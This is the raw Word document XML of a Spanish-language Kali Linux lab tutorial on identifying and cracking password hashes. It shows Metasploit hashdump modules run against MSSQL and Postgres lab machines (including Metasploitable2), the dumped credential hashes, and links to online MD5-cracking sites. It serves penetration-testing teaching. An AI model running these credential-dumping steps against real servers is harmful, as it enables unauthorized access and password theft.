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F3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">bueno en ocasiones nos podemos encontrar con algunos hashes, los cuales recolectamos en el camino o descubrimos en las </w:t>
      </w:r>
      <w:r>
        <w:t>fase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r>
        <w:t>explotación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, con kali </w:t>
      </w:r>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>también</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> podemos identificar </w:t>
      </w:r>
      <w:r>
        <w:t>qué</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tipo de hash tenemos para </w:t>
      </w:r>
      <w:r>
        <w:t>después</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> poder </w:t>
      </w:r>
      <w:r>
        <w:t>romperlos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con diferentes herramientas que </w:t>
      </w:r>
      <w:r>
        <w:t>vienen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> por defecto en la </w:t>
      </w:r>
      <w:r>
        <w:t>instalación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de nuestro amado kali </w:t>
      </w:r>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>Una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gran herramienta que podemos usar dentro de kali es la herramienta hash-identifier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>Pero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> primero </w:t>
      </w:r>
      <w:r>
        <w:t>vamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a descargar los hashes de las explotaciones anteriores.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/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msf5 &gt; search hashdump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msf5 &gt; use 5 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msf5 auxiliary(scanner/mssql/mssql_hashdump) &gt; show options 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Module options (auxiliary/scanner/mssql/mssql_hashdump):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Name                 Current Setting  Required  Description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----                 ---------------  --------  -----------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PASSWORD                              no        The password for the specified username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RHOSTS               192.168.52.222   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'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RPORT                1433             yes       The target port (TCP)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TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"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THREADS              1                yes       The number of concurrent threads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USERNAME             sa               no        The username to authenticate as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  USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)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msf5 auxiliary(scanner/mssql/mssql_hashdump) &gt; set PASSWORD password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PASSWORD =&gt; password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msf5 auxiliary(scanner/mssql/mssql_hashdump) &gt; run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[*] 192.168.52.222:1433   - Instance Name: "SQLEXPRESS"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[+] 192.168.52.222:1433   - Saving mssql05 = sa:01004086ceb6e0bc04fe5027a51df29e1cf0b74dd3c33214d9db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[*] 192.168.52.222:1433   - Scanned 1 of 1 hosts (100% complete)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[*] Auxiliary module execution completed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msf5 auxiliary(scanner/mssql/mssql_hashdump) &gt; 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</w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vamos a hacer lo mismo para la otra </w:t>
      </w:r>
      <w:r>
        <w:t>explotación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con la maquina metasplotaible2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>Buscaremos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el modulo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>msf5 auxiliary(scanner/mssql/mssql_hashdump) &gt; use 9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>Vemos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> las opciones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/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msf5 auxiliary(scanner/postgres/postgres_hashdump) &gt; show options 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Agregamos</w:t>
      </w:r>
      <w:r w:rsidRPr="00593DF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> el host.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msf5 auxiliary(scanner/postgres/postgres_hashdump) &gt; set rhosts 192.168.0.170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Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00593DF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> explotamos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msf5 auxiliary(scanner/postgres/postgres_hashdump) &gt; run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[+] Query appears to have run successfully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lastRenderedPageBreak/>
        <w:t>[+] Postgres Server Hashes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======================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Username  Hash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--------  ----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 postgres  md53175bce1d3201d16594cebf9d7eb3f9d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[*] Scanned 1 of 1 hosts (100% complete)</w:t>
      </w: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>[*] Auxiliary module execution completed</w:t>
      </w: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</w:p>
    <w:p w:rsidR="00593DF3" w:rsidRPr="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593DF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">root@computaxion:~# hash-identifier </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRPr="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>Pero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> primero </w:t>
      </w:r>
      <w:r>
        <w:t>vamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a ver nuestra bd para ver si se nos guardaron nuestras credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en otra consola </w:t>
      </w:r>
      <w:r>
        <w:t>vamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a ver los hashes que tenemos dentro de nuestra bd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>3175bce1d3201d16594cebf9d7eb3f9d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>5027a51df29e1cf0b74dd3c33214d9db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>ca4f44a8103a0cf3a5a9074bb75af180</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>0e61d0c92e5abaf84358584a763bf2e0899eeabf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>f5b8569f25528d10c56fe9808b0aa9e3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>0ac6cd34e2fac333bf0ee3cd06bdcf96</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>c1a11f61c989f5f3b38da9b7b35145c1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>fa0a5b2fa1cf0a31ae9e8d793ce880bb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>Un hash MD5 está compuesto por 32 caracteres hexadecimales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>Sitios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web de </w:t>
      </w:r>
      <w:r>
        <w:t>interés</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>https://hashkiller.co.uk/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>https://www.md5online.org/md5-decrypt.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593DF3" w:rsidRDefault="00593DF3" w:rsidP="00593DF3"/>
    <w:p w:rsidR="008928EA" w:rsidRDefault="00593DF3" w:rsidP="00593DF3">
      <w:r>
        <w:t>https://md5hashing.net/hash/md5</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00892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F3"/>
    <w:rsid w:val="00593DF3"/>
    <w:rsid w:val="0089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CB0D-C882-42B5-9D22-80737874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503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2019-10-21T20:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-21T20:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>